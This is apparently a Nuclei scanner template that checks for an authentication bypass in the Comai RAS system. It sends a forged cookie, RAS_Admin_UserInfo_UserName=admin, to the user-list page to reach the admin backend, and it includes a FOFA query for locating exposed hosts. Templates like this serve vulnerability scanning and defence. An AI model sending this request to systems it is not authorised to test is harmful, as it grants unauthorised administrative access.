id: comai-ras-cookie-bypass

info:
  name: Comai RAS System Cookie - Authentication Override
  author: SleepingBag945
  severity: high
  description: |
    Comai RAS system has cookie authentication overreach, when RAS_Admin_UserInfo_UserName is set to admin, the background can be accessed
  reference:
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/%E7%A7%91%E8%BF%88/%E7%A7%91%E8%BF%88%20RAS%E7%B3%BB%E7%BB%9F%20Cookie%E9%AA%8C%E8%AF%81%E8%B6%8A%E6%9D%83%E6%BC%8F%E6%B4%9E.md
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/maike-ras-cookie-bypass.yaml
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="科迈-RAS系统"
  tags: comai-ras,ras,kemai

http:
  - raw:
      - |
        GET /Server/CmxUser.php?pgid=UserList HTTP/1.1
        Host: {{Hostname}}
        cookie: RAS_Admin_UserInfo_UserName=admin

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "\"?pgid=User_Show"
          - "usingeKey"
          - "MachineAmount"
          - "AppLoginType"
          - "TimeType"
        condition: and

      - type: status
        status:
          - 200

# digest: 4a0a0047304502207e51c0d6678dc9b7bcc549e108b3641e9d5c254a52d52b78ed4fb371afdd6722022100fdd97de7f9fd014948e262071ef4e0c1c49312a5ede641e4a5fc3547c0e6564c:922c64590222798bb761d5b6d8e72950